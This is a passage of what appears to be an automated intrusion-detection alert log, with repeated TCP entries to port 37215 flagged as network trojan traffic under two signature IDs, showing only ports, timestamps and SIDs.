                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.231077
                  SID:2829579
                  Source Port:52498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.525692
                  SID:2835222
                  Source Port:58474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.915899
                  SID:2829579
                  Source Port:49138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.004841
                  SID:2829579
                  Source Port:57706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.883274
                  SID:2835222
                  Source Port:49320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.522078
                  SID:2829579
                  Source Port:39610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.139461
                  SID:2835222
                  Source Port:54300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.347841
                  SID:2835222
                  Source Port:51734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.879292
                  SID:2829579
                  Source Port:44862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.835820
                  SID:2829579
                  Source Port:50818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.973099
                  SID:2829579
                  Source Port:47740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.761850
                  SID:2835222
                  Source Port:39510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.653276
                  SID:2829579
                  Source Port:52758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.880406
                  SID:2835222
                  Source Port:60832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.619051
                  SID:2835222
                  Source Port:50256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.545025
                  SID:2829579
                  Source Port:44422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.558089
                  SID:2835222
                  Source Port:48166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.752992
                  SID:2835222
                  Source Port:52904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.463338
                  SID:2835222
                  Source Port:34224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.822403
                  SID:2829579
                  Source Port:44584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.647061
                  SID:2829579
                  Source Port:39924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.825346
                  SID:2835222
                  Source Port:52348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.842346
                  SID:2829579
                  Source Port:52010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.577437
                  SID:2829579
                  Source Port:60854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.111438
                  SID:2835222
                  Source Port:33806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.124303
                  SID:2829579
                  Source Port:36190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.720259
                  SID:2835222
                  Source Port:35490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.655203
                  SID:2835222
                  Source Port:35444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.046169
                  SID:2835222
                  Source Port:35792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.713774
                  SID:2835222
                  Source Port:52058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.373658
                  SID:2835222
                  Source Port:46154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.265037
                  SID:2829579
                  Source Port:50740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.762388
                  SID:2829579
                  Source Port:55582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.932722
                  SID:2835222
                  Source Port:57178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.974548
                  SID:2835222
                  Source Port:53478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.177629
                  SID:2835222
                  Source Port:56478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.557589
                  SID:2829579
                  Source Port:54914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.060029
                  SID:2829579
                  Source Port:34782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.365607
                  SID:2835222
                  Source Port:52308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.029781
                  SID:2835222
                  Source Port:39190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.475400
                  SID:2835222
                  Source Port:49394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.601201
                  SID:2835222
                  Source Port:47700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.945197
                  SID:2829579
                  Source Port:47562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.093186
                  SID:2829579
                  Source Port:52228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.532375
                  SID:2835222
                  Source Port:46716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.859176
                  SID:2829579
                  Source Port:45756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.433445
                  SID:2829579
                  Source Port:49888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.005613
                  SID:2829579
                  Source Port:44450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.615348
                  SID:2835222
                  Source Port:58708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.048975
                  SID:2835222
                  Source Port:48726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.501573
                  SID:2835222
                  Source Port:37286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.853209
                  SID:2835222
                  Source Port:35164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.551648
                  SID:2829579
                  Source Port:56100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.040022
                  SID:2835222
                  Source Port:45946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.994983
                  SID:2829579
                  Source Port:46090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.845095
                  SID:2829579
                  Source Port:36160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.202675
                  SID:2835222
                  Source Port:40774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.841554
                  SID:2829579
                  Source Port:49670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.005149
                  SID:2829579
                  Source Port:39914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.980913
                  SID:2829579
                  Source Port:33602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.372350
                  SID:2835222
                  Source Port:38690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.187886
                  SID:2835222
                  Source Port:46970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.008672
                  SID:2835222
                  Source Port:47864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.533140
                  SID:2835222
                  Source Port:42680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.525366
                  SID:2829579
                  Source Port:54678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.288558
                  SID:2829579
                  Source Port:54608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.878894
                  SID:2829579
                  Source Port:43602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.937320
                  SID:2829579
                  Source Port:37550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.248945
                  SID:2829579
                  Source Port:51228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.211493
                  SID:2829579
                  Source Port:47392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.530198
                  SID:2835222
                  Source Port:54524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.894597
                  SID:2835222
                  Source Port:46544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.633104
                  SID:2835222
                  Source Port:49684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.556430
                  SID:2829579
                  Source Port:36728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.812772
                  SID:2835222
                  Source Port:56648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.229660
                  SID:2829579
                  Source Port:55170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.044881
                  SID:2835222
                  Source Port:37152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.891273
                  SID:2829579
                  Source Port:53326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.723777
                  SID:2835222
                  Source Port:50252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.559364
                  SID:2835222
                  Source Port:58746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.442977
                  SID:2835222
                  Source Port:41758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.244914
                  SID:2835222
                  Source Port:53602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.146093
                  SID:2829579
                  Source Port:36456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.429574
                  SID:2835222
                  Source Port:46156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.346180
                  SID:2835222
                  Source Port:58270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.927826
                  SID:2829579
                  Source Port:36384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.903280
                  SID:2835222
                  Source Port:59396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.805226
                  SID:2829579
                  Source Port:41202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.686169
                  SID:2835222
                  Source Port:53822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.811235
                  SID:2829579
                  Source Port:50922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.163941
                  SID:2835222
                  Source Port:51170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.828942
                  SID:2835222
                  Source Port:42530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.324840
                  SID:2835222
                  Source Port:35376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.878204
                  SID:2835222
                  Source Port:35294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.527046
                  SID:2829579
                  Source Port:53708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.590794
                  SID:2829579
                  Source Port:41784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.330413
                  SID:2835222
                  Source Port:53946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.499089
                  SID:2829579
                  Source Port:45258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.627051
                  SID:2835222
                  Source Port:44678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.123925
                  SID:2835222
                  Source Port:56762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.768210
                  SID:2829579
                  Source Port:38120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.298138
                  SID:2829579
                  Source Port:38594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.619838
                  SID:2829579
                  Source Port:33550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.298468
                  SID:2835222
                  Source Port:54620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.851585
                  SID:2829579
                  Source Port:48388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.614607
                  SID:2835222
                  Source Port:49090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.108288
                  SID:2829579
                  Source Port:50582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.202822
                  SID:2829579
                  Source Port:45866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.787067
                  SID:2829579
                  Source Port:42824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.432680
                  SID:2829579
                  Source Port:38300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.417840
                  SID:2835222
                  Source Port:47814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.990619
                  SID:2835222
                  Source Port:55090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.358435
                  SID:2829579
                  Source Port:35030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.744947
                  SID:2829579
                  Source Port:47602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.823408
                  SID:2835222
                  Source Port:55510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.949585
                  SID:2835222
                  Source Port:41190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.761558
                  SID:2829579
                  Source Port:55238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.803775
                  SID:2835222
                  Source Port:59690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.165581
                  SID:2835222
                  Source Port:57684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.573174
                  SID:2829579
                  Source Port:33272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.392064
                  SID:2829579
                  Source Port:57744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.880494
                  SID:2835222
                  Source Port:37316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.222461
                  SID:2835222
                  Source Port:37144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.817942
                  SID:2829579
                  Source Port:43584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.046774
                  SID:2835222
                  Source Port:43336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.825233
                  SID:2829579
                  Source Port:54154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.724470
                  SID:2829579
                  Source Port:57196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.937541
                  SID:2835222
                  Source Port:55264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.717127
                  SID:2829579
                  Source Port:36322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.535069
                  SID:2829579
                  Source Port:58456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.501206
                  SID:2829579
                  Source Port:48014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.593375
                  SID:2829579
                  Source Port:46468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.160088
                  SID:2829579
                  Source Port:37554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.179104
                  SID:2835222
                  Source Port:43488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.920289
                  SID:2829579
                  Source Port:57658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.453696
                  SID:2829579
                  Source Port:33958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.992846
                  SID:2835222
                  Source Port:49932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.036336
                  SID:2829579
                  Source Port:35668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.560985
                  SID:2835222
                  Source Port:34922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.612938
                  SID:2835222
                  Source Port:50188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.177973
                  SID:2835222
                  Source Port:37004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369832
                  SID:2835222
                  Source Port:60154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.054152
                  SID:2829579
                  Source Port:49744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.577578
                  SID:2829579
                  Source Port:60184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.393096
                  SID:2829579
                  Source Port:49054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.828822
                  SID:2835222
                  Source Port:57026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.342847
                  SID:2835222
                  Source Port:50284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.996210
                  SID:2835222
                  Source Port:36316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:36.290826
                  SID:2835222
                  Source Port:47738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.766044
                  SID:2829579
                  Source Port:36310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.366131
                  SID:2835222
                  Source Port:42680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.354961
                  SID:2829579
                  Source Port:53626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.890636
                  SID:2835222
                  Source Port:56432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.976199
                  SID:2829579
                  Source Port:39154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.247887
                  SID:2829579
                  Source Port:60596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.175137
                  SID:2835222
                  Source Port:56522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.539948
                  SID:2829579
                  Source Port:58660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.430749
                  SID:2835222
                  Source Port:34060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.961698
                  SID:2829579
                  Source Port:47768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.092016
                  SID:2835222
                  Source Port:58130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.330913
                  SID:2829579
                  Source Port:40916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.406931
                  SID:2835222
                  Source Port:44732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.679759
                  SID:2835222
                  Source Port:44146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.259688
                  SID:2829579
                  Source Port:40094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.058649
                  SID:2835222
                  Source Port:32890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.891775
                  SID:2829579
                  Source Port:37032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.746967
                  SID:2835222
                  Source Port:39966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.064237
                  SID:2835222
                  Source Port:39418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.313127
                  SID:2835222
                  Source Port:34548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.265818
                  SID:2829579
                  Source Port:58920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.636057
                  SID:2835222
                  Source Port:58160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.290610
                  SID:2829579
                  Source Port:54210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.540187
                  SID:2829579
                  Source Port:57194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.490587
                  SID:2835222
                  Source Port:38968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.422787
                  SID:2835222
                  Source Port:50748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.609445
                  SID:2829579
                  Source Port:43204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.789365
                  SID:2829579
                  Source Port:49226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.993407
                  SID:2835222
                  Source Port:43922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.631591
                  SID:2829579
                  Source Port:36788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.743093
                  SID:2829579
                  Source Port:60018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.623766
                  SID:2829579
                  Source Port:42120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.515287
                  SID:2829579
                  Source Port:57070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.986495
                  SID:2835222
